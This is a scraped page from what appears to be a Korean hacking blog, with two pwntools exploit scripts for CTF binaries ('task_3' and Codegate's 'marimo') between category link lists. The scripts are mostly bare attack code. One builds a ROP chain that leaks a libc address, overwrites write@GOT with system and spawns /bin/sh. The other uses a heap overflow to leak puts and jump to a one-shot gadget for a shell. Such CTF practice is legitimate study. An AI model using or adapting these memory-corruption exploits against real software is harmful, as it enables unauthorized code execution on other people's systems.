from pwn import *

r = process("./task_3")
elf = ELF("./task_3")

read_plt = elf.plt['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
pppr = 0x0804855d
bss = elf.bss()
binsh = "/bin/sh\x00"

payload = "\x90"*140
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(6)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)

payload += p32(write_plt)
payload += "\x90"*4
payload += p32(bss)

r.sendline(payload)

libc_write = u32(r.recv(4))
libc_system = libc_write - 0x9add0

log.info("libc_write = {}".format(hex(libc_write)))
log.info("libc_system = {}".format(hex(libc_system)))
r.send(p32(libc_system))
r.send(binsh)

r.interactive()

'CTF' 카테고리의 다른 글

CSAW2016 tutorial  (0) 2019.02.01
TJCTF 2016 oneshot  (0) 2019.01.24
SEC-T CTF PingPong  (0) 2018.09.16
BCTF 2016 bcloud  (0) 2018.08.24
Defcon 2014 Babyfirst heap  (0) 2018.08.16
exploit code
from pwn import *
import time

def show_me_the_marimo(name, profile):
	r.sendline("show me the marimo")

	print r.recvuntil(">>")
	r.sendline(name)
	print r.recvuntil(">>")
	r.sendline(profile)
	print r.recvuntil(">>")

def view(select):
	r.sendline("V")
	print r.recvuntil(">>")
	r.sendline(select)

if __name__ == "__main__":
	binary = "./marimo"
	elf = ELF(binary)
	r = process(binary)

	#strcmp_got = elf.got['strcmp']
	puts_got = elf.got['puts']

	print r.recvuntil(">>")

	show_me_the_marimo("A"*4, "B"*4)
	show_me_the_marimo("C"*4, "D"*4)

	time.sleep(3)
	payload = "A"*52
	payload += p32(0x0)
	payload += p64(puts_got)
	#payload += p64(strcmp_got)
	payload += p64(puts_got)

	view("0")
	print r.recvuntil(">>")
	r.sendline("M")
	print r.recvuntil(">>")
	r.sendline(payload)
	#pause()
	print r.recvuntil(">>")
	r.sendline("B")
	print r.recvuntil(">>")

	view("1")
	print r.recvuntil("name : ")
	libc_puts = u64(r.recv(6).ljust(8, "\x00"))

	print r.recvuntil(">>")
	log.info("libc_puts = {}".format(hex(libc_puts)))
	libc_oneshot = libc_puts - 0x2a47a
	log.info("oneshot = {}".format(hex(libc_oneshot)))
	r.sendline("M")
	print r.recvuntil(">>")
	#pause()
	r.sendline(p64(libc_oneshot))
	#pause()

	r.interactive()


'CTF > Codegate' 카테고리의 다른 글

codegate2019 20000  (0) 2019.02.07
CodeGate2018 BaskinRobins31  (0) 2018.07.14
Codegate 2018 RedVelvet writeup  (0) 2018.02.04


헷갈릴 때 마다 봐야지 ㅎㅎ


'HACKING > System hacking' 카테고리의 다른 글

fastbin_dup_into_stack  (0) 2019.06.03
remote socket exploit??  (0) 2019.02.03
free_hook으로 Full Relro 우회  (0) 2018.09.17
ltrace로 main함수 심볼 찾기  (0) 2018.09.16
vim jail 문제  (0) 2018.09.08

+ Recent posts

티스토리툴바